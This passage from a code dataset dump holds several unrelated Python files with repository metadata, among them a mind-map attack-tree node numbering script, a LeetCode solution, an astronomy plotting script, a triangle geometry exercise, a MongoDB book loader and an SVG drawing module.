(Inverse of array_to_concatenated_string).\n \"\"\"\n return np.array([int(x) for x in string.split(\",\")])\n\n\ndef parse_input(giant_string):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Parse the input data into 3 arrays: the training data, training labels,\n and testing data.\n\n Dimensions of the input data are:\n - X_train: (250, 3)\n - Y_train: (250,)\n - X_test: (50, 3)\n \"\"\"\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\n\n X_train_row_strings = X_train_part.split(\"S\")\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\n X_train = np.array(X_train_rows)\n\n Y_train = concatenated_string_to_array(Y_train_part)\n\n X_test_row_strings = X_test_part.split(\"S\")\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\n X_test = np.array(X_test_rows)\n\n return X_train, Y_train, X_test\n\n\nif __name__ == \"__main__\":\n # DO NOT MODIFY anything in this code block\n\n X_train, Y_train, X_test = parse_input(sys.stdin.read())\n output_string = classify_data(X_train, Y_train, X_test)\n print(f\"{output_string}\")\n","repo_name":"pdebus/qhack2021","sub_path":"circuit_training_500/circuit_training_500_template.py","file_name":"circuit_training_500_template.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"5902175381","text":"#!/usr/bin/env python\n\nimport sys,json\n\nlevels_count = dict()\n\ndef do_ideas(depth, node):\n\tglobal levels_count\n\n\tif not depth in levels_count:\n\t\tlevels_count.update({depth: 0})\n\n\tfor key, value in iter(sorted(node.get('ideas', dict()).iteritems(), key=lambda t: float(t[0]))):\n\t\tadd_label(depth+1, value)\n\treturn\n\ndef add_label(depth, node):\n\tglobal levels_count\n\n\tdo_ideas(depth, node)\n\n\tif node.get('title', None) == 'AND':\n\t\treturn\n\n\tif node.get('title', None) == '...':\n\t\treturn\n\n\tif not node.get('title', '').find('(*)') == -1:\n\t\treturn\n\n\tworking_title = \"%s.%s %s\" % (depth, levels_count[depth], node.get('title', None))\n\n\tlevels_count[depth] += 1\n\n\tif not node.get('title', None).startswith(working_title):\n\t\tnode.update({'title': working_title})\n\treturn\n\ndepth=0\n\nif len(sys.argv) < 1:\n\tfd_in=sys.stdin\nelse:\n\tfd_in=open(sys.argv[1], 'r')\n\ndata = json.load(fd_in)\n\nif len(sys.argv) < 1:\n\tfd_out = sys.stdout\nelse:\n\tfd_in.close()\n\tfd_out=open(sys.argv[1],'w')\n\nif 'id' in data and data['id'] == 'root':\n\t#version 2 mindmup\n\tdo_ideas(depth, data['ideas']['1'])\nelse:\n\tdo_ideas(depth, data)\n\nfd_out.write(json.dumps(data, indent=2, sort_keys=True))\n\nif len(sys.argv) >= 1:\n\tfd_out.close()\n\n","repo_name":"gunnarx/mindmup-as-attack-trees","sub_path":"scripts/add-numbered-ids.py","file_name":"add-numbered-ids.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"} +{"seq_id":"39769972094","text":"class Solution:\n def findLHS(self, nums: List[int]) -> int:\n counterNumber = {}\n for i in nums:\n if i not in counterNumber:\n counterNumber[i] = 0\n counterNumber[i] += 1\n\n counter = 0\n temp = list(sorted(counterNumber.items(), key=lambda x: (x[0], x[1])))\n\n for i in range(len(temp) - 1):\n if abs(temp[i][0] - temp[i + 1][0]) == 1:\n if temp[i][1] + temp[i + 1][1] > counter:\n counter = temp[i][1] + temp[i + 1][1]\n return (counter)","repo_name":"Navjot8/LeetCodeSolutions","sub_path":"Longest Harmonious 
Subsequence.py","file_name":"Longest Harmonious Subsequence.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72180717524","text":"import unittest\nfrom TestUtils import TestLexer\n\n\nclass LexerSuite(unittest.TestCase):\n\n def test_lowercase_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.test(\"\"\"\n main: function void () {\n a = readInteger();\n //b = readFloat();\n //c = readBoolean();\n //d = readString();\n }\n \"\"\", \"abc,\", 101))\n","repo_name":"hongnhat195/PPL-2","sub_path":"src/test/LexerSuite.py","file_name":"LexerSuite.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72891486805","text":"\"\"\"\n\nariel@sacrafamiglia\n23/04/2022\n\nStatistically testing the effect of the nebular continuum emission in the derived properties\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\nfrom toolbox import plot_tools\nfrom pysinopsis.utils import calc_mwage\n\ndata_dir = '/home/ariel/Workspace/GASP/HST/Data/'\n\nparametric = Table.read(data_dir + 'tail_all31_default_halpha_bagpipes_results.fits')\nnonparametric = Table.read(data_dir + 'tail_all31_default_nonparametric_halpha_bagpipes_results.fits')\nnonparametric_hacked = Table.read(data_dir + 'tail_all31_default_nonparametric_halpha_bagpipes_results_nebcont_hacked'\n '.fits')\n\ncases = (nonparametric['stellar_mass'] - parametric['stellar_mass'] > 1)\nprint(parametric['blob_id'][cases])\n\nplt.figure()\nplt.scatter(nonparametric['stellar_mass'], parametric['stellar_mass'])\nplt.scatter(nonparametric['stellar_mass'][cases], parametric['stellar_mass'][cases])\nx = np.linspace(np.min(nonparametric['stellar_mass']) - 1, np.max(nonparametric['stellar_mass']) + 1)\ny = x\nplt.plot(x, y, '--k')\nplt.xlabel('Nonparametric Stellar Mass', fontsize=20)\nplt.ylabel('Parametric Stellar Mass', fontsize=20)\n\nage_bins = [0, 2.0e6, 4.0e6, 7.0e6, 2.0e7, 5.5e7, 2.0e8, 5.5e8, 1.0e9, 3.0e9,\n 5.75e9, 1.0e10, 1.4e10]\nage_bins_len = [age_bins[i+1]-age_bins[i] for i in range(12)]\nage_bins_mid = [(age_bins[i+1]+age_bins[i])/2 for i in range(12)]\n\nold_component = np.log10(np.array([np.sum(10**nonparametric['formed_mass'][i][9:])\n for i in range(len(nonparametric))]))\n\nplt.figure()\nplt.scatter(old_component, nonparametric['stellar_mass'] - parametric['stellar_mass'])\nplt.scatter(old_component[cases], (nonparametric['stellar_mass'] - parametric['stellar_mass'])[cases])\nplt.xlabel('Mass Formed in The Old Component', fontsize=20)\nplt.ylabel('Current Stellar Mass Difference', fontsize=20)\n\n# plt.scatter(nonparametric['mwage'], mwage_nonparametric)\n# x = np.linspace(np.min(nonparametric['mwage']) - 1, np.max(nonparametric['mwage']) + 1)\n# y = x\n# plt.plot(x, y, '--k')\n\n# plt.scatter(nonparametric['stellar_mass'], parametric['stellar_mass'])\n# x = np.linspace(np.min(nonparametric['stellar_mass']) - 1, np.max(nonparametric['stellar_mass']) + 1)\n# y = x\n# plt.plot(x, y, '--k')\n\nold_component = np.log10(np.array([np.sum(10**nonparametric['formed_mass'][i][9:])\n for i in range(len(nonparametric))]))\nold_component_hacked = np.log10(np.array([np.sum(10**nonparametric_hacked['formed_mass'][i][9:])\n for i in range(len(nonparametric_hacked))]))\n\nplt.scatter(old_component-old_component_hacked, 
nonparametric['stellar_mass']-nonparametric_hacked['stellar_mass'])","repo_name":"arielwrl/HST_blobs","sub_path":"BAGPIPES/test_nebular_continuum_effect.py","file_name":"test_nebular_continuum_effect.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"37179047485","text":"from math import sqrt\r\n\r\n\r\nx1 = int(input('Введите x-координату первой вершины треугольника: '))\r\ny1 = int(input('Введите y-координату первой вершины треугольника: '))\r\nx2 = int(input('Введите x-координату второй вершины треугольника: '))\r\ny2 = int(input('Введите y-координату второй вершины треугольника: '))\r\nx3 = int(input('Введите x-координату третьей вершины треугольника: '))\r\ny3 = int(input('Введите y-координату третьей вершины треугольника: '))\r\n\r\nABx = x2 - x1 # Находим координаты векторов-сторон треугольника\r\nABy = y2 - y1\r\nBCx = x3 - x2\r\nBCy = y3 - y2\r\nACx = x3 - x1\r\nACy = y3 - y1\r\n\r\n# Пусть a = AB, b = BC, c = AC\r\n\r\na = sqrt(ABx * ABx + ABy * ABy) # Находим длины сторон треугольника\r\nb = sqrt(BCx * BCx + BCy * BCy)\r\nc = sqrt(ACx * ACx + ACy * ACy)\r\n\r\nif abs(a - b - c) >= 0.01 or abs(b - a - c) >= 0.01 or abs(c - a - b) >= 0.01:\r\n print()\r\n print('Такого треугольника не существует')\r\nelse:\r\n p = (a + b + c) / 2 # Полупериметр треугольника\r\n s = sqrt(p * (p - a) * (p - b) * (p - c)) # Площадь треугольника\r\n\r\n if a > b and a > c: # Поиск наибольшей стороны\r\n h = (2 * s) / a # Находим длину высоты\r\n elif b > a and b > c:\r\n h = (2 * s) / b\r\n elif c > a and c > b:\r\n h = (2 * s) / c\r\n\r\n x4 = float(input('Введите x-координату точки: '))\r\n y4 = float(input('Введите y-координату точки: '))\r\n\r\n AOx = x4 - x1 # Находим координаты векторов AO, BO, CO, где O -\r\n AOy = y4 - y1 # точка с координатами (x4; y4)\r\n BOx = x4 - x2\r\n BOy = y4 - y2\r\n COx = x4 - x3\r\n COy = y4 - y3\r\n\r\n AO_length = sqrt(AOx * AOx + AOy * AOy) # Длины отрезков, соединяющих точку O с вершинами\r\n BO_length = sqrt(BOx * BOx + BOy * BOy)\r\n CO_length = sqrt(COx * COx + COy * COy)\r\n\r\n p1 = (a + AO_length + BO_length) / 2\r\n s1 = sqrt(p1 * (p1 - a) * (p1 - AO_length) * (p1 - BO_length))\r\n p2 = (b + BO_length + CO_length) / 2\r\n s2 = sqrt(p2 * (p2 - b) * (p2 - CO_length) * (p2 - BO_length))\r\n p3 = (c + AO_length + CO_length) / 2\r\n s3 = sqrt(p3 * (p3 - c) * (p3 - CO_length) * (p3 - AO_length))\r\n\r\n print()\r\n print('Длина стороны a: {:3.2f}, длина стороны b: {:3.2f}, '\r\n 'длина стороны c: {:3.2f}'.format(a, b, c))\r\n print('Длина высоты, проведенной из наибольшего угла: {:3.2f}'.format(h))\r\n if abs(s - (s1 + s2 + s3)) <= 0.01:\r\n l1 = (2 * s1) / a\r\n l2 = (2 * s2) / b\r\n l3 = (2 * s3) / c\r\n if l1 <= l2 and l1 <= l3:\r\n l = l1\r\n elif l2 <= l1 and l2 <= l3:\r\n l = l2\r\n else:\r\n l = l3\r\n print('Точка O({};{}) принадлежит треугольнику'.format(x4, y4))\r\n print('Расстояние от точки O до ближайшей стороны: {:3.2f}'.format(l))\r\n else:\r\n print('Точка O({};{}) не принадлежит треугольнику'.format(x4, y4))\r\n if a > b and a > c:\r\n if a * a > c * c + b * b + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не тупоугольный')\r\n elif b > a and b > c:\r\n if b * b > c * c + a * a + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не тупоугольный')\r\n else:\r\n if c * c > b * b + a * a + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не 
тупоугольный')\r\n","repo_name":"marchenko-vs/ics7-pyprog","sub_path":"sem_01/lab_03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"18037109791","text":"from pymongo import MongoClient\nfrom mimesis import Text\nimport pandas as pd\nfrom progress.bar import Bar\n\nclient = MongoClient()\ntext_faker = Text(locale='en')\n\n\ndef connect_db(db_name, collection_name):\n db = client[db_name]\n collection = db[collection_name]\n return collection\n\n\ndef store_books():\n books_collection = connect_db('goodreads', 'books')\n df_books = pd.read_csv('./goodbooks-10k/books.csv', index_col=0)\n books_list = []\n bar = Bar('Processing books', max=len(df_books))\n for idx, book in df_books.iterrows():\n data = {\n 'bookId': book['book_id'],\n 'workId': book['work_id'],\n 'originalTitle': book['original_title'],\n 'title': book['title'],\n 'isbn': book['isbn'],\n 'isbn13': book['isbn13'],\n 'authors': book['authors'].split(','),\n 'publicationYear': book['original_publication_year'],\n 'languageCode': book['language_code'],\n 'avgRating': book['average_rating'],\n 'ratingsCount': book['ratings_count'],\n 'workRatingsCount': book['work_ratings_count'],\n 'workTextReviewsCount': book['work_ratings_count'],\n 'ratings1': book['ratings_1'],\n 'ratings2': book['ratings_2'],\n 'ratings3': book['ratings_3'],\n 'ratings4': book['ratings_4'],\n 'ratings5': book['ratings_5'],\n 'coverURL': book['image_url'],\n 'smallCoverURL': book['small_image_url'],\n 'Description': text_faker.text(),\n }\n books_list.append(data)\n bar.next()\n bar.finish()\n result = books_collection.insert_many(books_list)\n print(f'{len(result.inserted_ids)} inserted books')\n\n\ndef main():\n store_books()\n\n\nif __name__ == '__main__':\n main()","repo_name":"leiverandres/goodreads-graphql","sub_path":"init_database.py","file_name":"init_database.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40602954731","text":"# simpleSVG.py is a module for generating SVG graphics.\n# It is especially useful for constructing nonstandard plots which are \n# not offered by a high level function call in the usual plotting packages. \n# Recommend that your first learn SVG, such as at http://www.svgbasics.com/index.html\n# Put this Python module either in your Python path or in your current working directory.\n# A test graphic is output by executing the module, e.g. in Linux: python simpleSVG.py\n# Written by Brian Fiedler, after some exploratory motivation by Charlie Pham. \n# v0.1 December 25, 2007 \n# v0.11 February 2, 2008, image command added\n# v0.12 October 6, 2008, clipping ability added\n# v0.13 January 4, 2010, added arc, and a few other things \n# v0.14 May 12, 2010, added radial \n# v0.20 June 22, 2011. 
Now works with both Python 2.6 and Python 3.1 \n####\n\n\nimport os,sys\nfrom math import *\n#from __future__ import print_function\ndisplay_prog = 'inkscape' #command to display images, using optional display() method\npyvers=sys.version_info[0]\nif pyvers >=3:\n\timport fractions\n\tfractype=type(fractions.Fraction(1,2))\n\nclass svg_class:\n\tdef __init__(self,fname=\"temp.svg\",bbx=512,bby=512,whiteback=True):\n\t\tself.fname = fname\n\t\tself.bbx = int(bbx)\n\t\tself.bby = int(bby)\n\t\tself.svg=open(self.fname,'w')\n\t\tself.group_count=0\n\t\theader = \"\"\"\n\n \n\"\"\" % (self.bby,self.bbx)\n\t\tself.svg.write(header)\n\t\tif whiteback: self.rect(0,0,self.bbx,self.bby,fill=\"white\") \n\t\tself.group(fill_opacity=1., fill=\"none\", stroke=\"black\", stroke_width=1,\n font_size=\"10pt\", font_family=\"Arial, sans-serif\") \n#\t\tself.scale() # after v.12, scale must be called explicitly, to prevent clipPath from premature definition \n\n\tdef close(self):\n\t\twhile self.group_count>=1: self.group()\n\t\tendfile = \"\\n\"\n\t\tself.svg.write(endfile)\n\t\tsys.stdout.write(\"The file \"+self.fname+\" was successfully written and closed by simpleSVG\\n\")\n\t\tself.svg.close()\n\t\treturn\n\n\tdef display(self,prog=display_prog):\n\t\tos.system(\"%s %s\" % (prog,self.fname))\n\t\treturn\n\n\tdef scale(self,xmin=0.,xmax=1.,ymin=0.,ymax=1., #sets the user coordinates\n\t\t\tleftmarg=50,rightmarg=50,botmarg=50,topmarg=50):\n\t\tself.xmin=xmin\n\t\tself.xmax=xmax\n\t\tself.ymin=ymin\n\t\tself.ymax=ymax\n\t\tself.leftmarg=leftmarg\n\t\tself.rightmarg=rightmarg\n\t\tself.botmarg=botmarg\n\t\tself.topmarg=topmarg\n\t\tself.xscale=float(self.bbx-self.leftmarg-self.rightmarg)/(self.xmax-self.xmin)\n\t\tself.yscale=float(self.bby-self.botmarg -self.topmarg )/(self.ymax-self.ymin)\n\t\tclippath=\"\"\"\n\n\n\"\"\" % (\nself.leftmarg, self.topmarg, self.bbx-self.leftmarg-self.rightmarg, self.bby-self.topmarg-self.botmarg)\n\t\tself.svg.write(clippath)\n\n\tdef ix(self,x): #svg x coordinate in pts as function of various types of user \"x\"\n\t\tif isinstance(x,float):\n\t\t\treturn self.leftmarg+(x-self.xmin)*self.xscale\n\t\telif isinstance(x,complex):\n\t\t\treturn x.imag*self.bbx\n\t\telif pyvers<3 and isinstance(x,long):\n\t\t\treturn x*.01\n\t\telif pyvers>=3 and type(x)==fractype:\n\t\t\treturn float(x) \n\t\telse:\n\t\t\treturn x \n\n\tdef jy(self,y): #svg y coordinate in pts as function of various types of user \"y\"\n\t\tif isinstance(y,float):\n\t\t\treturn self.bby-(self.botmarg+(y-self.ymin)*self.yscale)\n\t\telif isinstance(y,complex):\n\t\t\treturn y.imag*self.bby\n\t\telif pyvers<3 and isinstance(y,long):\n\t\t\treturn y*.01\n\t\telif pyvers>=3 and type(y)==fractype:\n\t\t\treturn float(y) \n\t\telse:\n\t\t\treturn y\n\t\t\n#sizes of things are scaled a bit differently from a position of a thing.\n\tdef sx(self,x): #pt size for fonts, ticks, radius, relative displacement etc., as function of user \"x\" size\n\t\tif isinstance(x,float):\n\t\t\treturn x*self.xscale\n\t\telif isinstance(x,complex):\n\t\t\treturn x.imag*self.bbx\n\t\telif pyvers<3 and isinstance(x,long):\n\t\t\treturn x*.01\n\t\telif pyvers>=3 and type(x)==fractype:\n\t\t\treturn float(x) \n\t\telse:\n\t\t\treturn x \n\t\t\n\tdef sy(self,y): #pt size for fonts, ticks, radius, relative displacement etc., as function of user \"y\" size\n\t\tif isinstance(y,float):\n\t\t\treturn -y*self.yscale #note minus sign!!\n\t\telif isinstance(y,complex):\n\t\t\treturn y.imag*self.bby\n\t\telif pyvers<3 and 
isinstance(y,long):\n\t\t\treturn y*.01\n\t\telif pyvers>=3 and type(y)==fractype:\n\t\t\treturn float(y) \n\t\telse:\n\t\t\treturn y \n\n\tdef pathdata(self,*a):\n\t\tb=[] #will store all the numbers and sequences of coordinates between the tags\n\t\ts=\"\" #a formatted string of all the coordinate pair numbers\n\t\td=\"\" #the pathdata string, for use in \\n')\n\n\tdef group(self,**k):\n\t\tif not k and self.group_count>=1:\n\t\t\tself.group_count-=1\n\t\t\tself.svg.write('\\n')\n\t\telse:\n\t\t\tstyle=k.pop('style',\"\")\n\t\t\ttransform=k.pop('transform',\"\")\n\t\t\tclippath=k.pop('clip_path',\"\")\n\t\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\t\tself.group_count+=1\n\t\t\tg='\\n')\n\t\t\t \n\n#SIMPLE DRAWING\n\n\tdef rect(self,x,y,width,height,**k): #better than native: negative width and height okay\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\td=self.pathdata('M',x,y,'l',width,0,'l',0,height,'l',-width,0,'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef rect2(self,x1,y1,x2,y2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\td=self.pathdata('M',x1,y1,'L',x2,y1,'L',x2,y2,'L',x1,y2,'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef poly(self,*a,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tb=[x for x in flattn(a)] \n\t\td=self.pathdata('M',b[0:2],'L',b[2:],'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef draw(self,*a,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tb=[x for x in flattn(a)] \n\t\td=self.pathdata('M',b[0:2],'L',b[2:])\n\t\tself.path(d=d,style=style)\n\n\tdef circle(self,cx,cy,r,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n')\n\n\tdef line(self,x1,y1,x2,y2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n')\n\n\tdef text(self,x,y,angle,text,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n'\n\t\tself.svg.write(p)\n\n#sector with center at user (x,y), but radius r1 and r2 are in pts:\n\tdef sector(self,x,y,r1,r2,a1,a2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\tif (a2180: largecircle='1'\n\t\ta1=pi*a1/180.\n\t\ta2=pi*a2/180.\n\t\tx11=r1*cos(a1)\n\t\tx21=r2*cos(a1)\n\t\tx12=r1*cos(a2)\n\t\tx22=r2*cos(a2)\n\t\ty11=r1*sin(a1)\n\t\ty21=r2*sin(a1)\n\t\ty12=r1*sin(a2)\n\t\ty22=r2*sin(a2)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'a',hires(r2),hires(r2),'0',largecircle+',0',hires(x22-x21),hires(-y22+y21),\\\n 'l',hires(x12-x22),hires(-y12+y22),'a',hires(r1),hires(r1),'0',largecircle+',1',hires(x11-x12),hires(-y11+y12),'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef radial(self,x,y,r1,r2,a1,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\ta1=pi*a1/180.\n\t\tx11=r1*cos(a1)\n\t\tx21=r2*cos(a1)\n\t\ty11=r1*sin(a1)\n\t\ty21=r2*sin(a1)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'l',hires(x11-x21),hires(-y11+y21))\n\t\tself.path(d=d,style=style)\n\n\tdef arc(self,x,y,r,a1,a2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): 
style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\tif (a2180: largecircle='1'\n\t\ta1=pi*a1/180.\n\t\ta2=pi*a2/180.\n\t\tx21=r*cos(a1)\n\t\tx22=r*cos(a2)\n\t\ty21=r*sin(a1)\n\t\ty22=r*sin(a2)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'a',hires(r),hires(r),'0',largecircle+',0',hires(x22-x21),hires(-y22+y21))\n\t\tself.path(d=d,style=style)\n\n#COMPOSITE DRAWING\n\tdef square(self,x,y,size,**k): #analog to circle, useful for plot symbol\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tself.group(style=style)\n\t\ti,j=hires(self.ix(x)),hires(self.jy(y))\n\t\tl=size*100\n\t\tself.rect2(i-l,j-l,i+l,j+l,style=style)\n\t\tself.group()\n\n\tdef arrow(self,x1,y1,x2,y2,headsize,**k): #headsize is in pts\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tself.group(style=style)\n\t\ti1,j1,i2,j2=self.ix(x1),self.jy(y1),self.ix(x2),self.jy(y2)\n\t\theadsize=self.sx(headsize)\n\t\tr=sqrt((i2-i1)**2+(j2-j1)**2)\n\t\tu=(i2-i1)/r\n\t\tv=(j2-j1)/r\n\t\tai=-.8*u-.6*v\n\t\taj=.6*u-.8*v\n\t\tbi=-.8*u+.6*v\n\t\tbj=-.6*u-.8*v\n\t\tx2=hires(i2+.5*headsize*(ai+bi))\n\t\ty2=hires(j2+.5*headsize*(aj+bj))\n\t\tself.line(x1,y1,x2,y2)\n\t\tself.path('M',hires(i2),hires(j2),'L',hires(i2+headsize*ai),hires(j2+headsize*aj),\\\n\t\t'L',hires(i2+headsize*bi),hires(j2+headsize*bj),'Z',stroke='none')\n\t\tself.group()\n\t\t\n\tdef fatarrow(self,x1,y1,x2,y2,asize,**k): #asize is the half-width of the fat arrow\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\ti1,j1,i2,j2=self.ix(x1),self.jy(y1),self.ix(x2),self.jy(y2)\n\t\tasize=self.sx(asize)\n\t\tr=sqrt((i2-i1)**2+(j2-j1)**2)\n\t\tu=asize*(i2-i1)/r\n\t\tv=asize*(j2-j1)/r\n\t\tpolypoints=[hires(q) for q in [i1+v,j1-u,\n\t\ti2+v-u,j2-u-v, i2,j2, i2-v-u,j2+u-v, i1-v,j1+u]]\n\t\tself.poly(polypoints,style=style)\n\n\tdef windbarb(self,x,y,s,a,h,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\ttransform= \"translate(%8.2f,%8.2f) rotate(%8.2f) \" % (self.ix(x),self.jy(y),a-90)\n\t\tself.group(style=style,transform=transform)\n\t\ti1,j1=self.ix(x),self.jy(y)\n\t\ta=0.\n\t\ti1=0.\n\t\tj1=0.\n\t\td=.13*h\n\t\tf=.5*h\n\t\tif s>=2.50:\n\t\t\tp=[0,0,-h,0]\n\t\t\tself.draw([hires(z) for z in p ])\n\t\telse:\n\t\t\tself.circle(hires(i1),hires(j1),int(abs(d)),fill='none')\n\t\tw=-h+d\n\t\tif s<47.50 and s>=7.50: w=-h\n\t\twhile s>=47.50:\n#\t\t\tp=[w,0,w-d,f,w-d,0]\n\t\t\tp=[w,0,w-d,-f,w-d,0]\n\t\t\tself.poly([hires(z) for z in p])\n\t\t\ts=s-50.\n\t\t\tw=w+d\n\t\twhile s>=7.50:\n#\t\t\tp=[w,0,w-d,f]\n\t\t\tp=[w,0,w-d,-f]\n\t\t\tself.draw([hires(z) for z in p])\n\t\t\ts=s-10.\n\t\t\tw=w+d\n\t\twhile s>=2.50:\n#\t\t\tp=[w,0,w-.5*d,.5*f]\n\t\t\tp=[w,0,w-.5*d,-.5*f]\n\t\t\tself.draw([hires(z) for z in p])\n\t\t\ts=s-5.\n\t\t\tw=w+d\n\t\tself.group()\n\tdef image(self,x,y,file,**k):\n\t\tp='\\n')\n\n#AXES DRAWING\n#If you don't use the defaults, you should call these using your user coordinates only,\n#except for ticklen and pad, which can be passed as an integer\n\tdef xaxis(self, y=\"\", #where to intersect the y-axis\n\t\t\tx1=\"\", #smallest x\n\t\t\tdx=\"\", #increment for tick marks\n\t\t\tx2=\"\", #largest x\n\t\t\tticklen=10, #length of ticks, in pts\n\t\t\tgrid=False,\n\t\t\txticks=None,\n\t\t\tpad=10, #padding for tick labels, usually fontsize\n\t\t\tform='%5.1f'): #format string for numerical 
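# --- The sector()/arc()/radial() methods above turn polar inputs (radius,
# angles in degrees) into the cartesian offsets fed to SVG 'a' arc commands.
# The large-arc comparison in the source looks mangled by extraction; the
# standard reading, (a2 - a1) > 180, is assumed in this re-derivation.
from math import pi, cos, sin

def arc_endpoints(r, a1_deg, a2_deg):
    largearc = '1' if a2_deg - a1_deg > 180 else '0'
    a1, a2 = pi * a1_deg / 180., pi * a2_deg / 180.
    start = (r * cos(a1), -r * sin(a1))   # y negated: SVG y grows downward
    end = (r * cos(a2), -r * sin(a2))
    return start, end, largearc

(_, _), (ex_, ey_), flag = arc_endpoints(30, 20, 180)
assert flag == '0' and abs(ex_ + 30) < 1e-9 and abs(ey_) < 1e-9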
labels\n#\t\tself.rect2(self.leftmarg,self.topmarg,self.bbx-self.rightmarg,self.bby-self.botmarg,fill=\"yellow\") #for testing \n\t\tif y==\"\": y=self.ymin\n\t\tif x1==\"\": x1=self.xmin\n\t\tif x2==\"\": x2=self.xmax\n\t\tif dx==\"\": dx=(self.xmax-self.xmin)*.1\n\t\tif xticks==None: xticks=[]\n\t\ty,x1,x2,dx=map(float,[y,x1,x2,dx])\n\t\tif grid:\n\t\t\ty2=float(self.ymax)\n\t\t\tself.line(x1,y2,x2,y2)\n\t\t\tticklen=self.jy(y2)-self.jy(y)\n\t\telse:\n\t\t\tticklen=self.sy(ticklen)\n\t\tself.line(x1,y,x2,y)\n\t\tif not xticks:\n\t\t\tx=x1\n\t\t\twhile x < x2*1.00001: #build tick positions\n\t\t\t\txticks.append(x)\n\t\t\t\tx=x+dx\n\t\tfor x in xticks: #render tick marks and labels\n\t\t\tif form: label=form % x\n\t\t\tself.path('M',x,y,'l',0,-ticklen)\n\t\t\tif form: self.text(x,y-1.5*pad/self.yscale,0,label,stroke_width=\".3pt\",text_anchor='middle')\n\n\tdef yaxis(self, x=\"\", #where to intersect the x-axis\n\t\t\ty1=\"\", #smallest y\n\t\t\tdy=\"\", #increment for tick marks\n\t\t\ty2=\"\", #largest y\n\t\t\tticklen=10, #length of ticks, in pts\n\t\t\tgrid=False,\n\t\t\tyticks=None,\n\t\t\tpad=10, #padding for tick labels, usually fontsize\n\t\t\tform='%5.1f'): #format for numerical labels\n\t\tif x==\"\": x=self.xmin\n\t\tif y1==\"\": y1=self.ymin\n\t\tif y2==\"\": y2=self.ymax\n\t\tif dy==\"\": dy=(self.ymax-self.ymin)*.1\n\t\tif yticks==None: yticks=[]\n\t\tx,y1,y2,dy=map(float,[x,y1,y2,dy])\n\t\tself.line(x,y1,x,y2)\n\t\tif grid:\n\t\t\tx2=float(self.xmax)\n\t\t\tself.line(x2,y1,x2,y2)\n\t\t\tticklen=self.ix(x2)-self.ix(x)\n\t\telse:\n\t\t\tticklen=self.sx(ticklen)\n\t\tif not yticks:\n\t\t\ty=y1\n\t\t\twhile y < y2*1.00001: \n\t\t\t\tyticks.append(y)\n\t\t\t\ty=y+dy\n\t\tfor y in yticks: #render tick marks and labels\n\t\t\tif form: label=form % y\n\t\t\tself.path('M',x,y,'l',ticklen,0)\n\t\t\tif form: 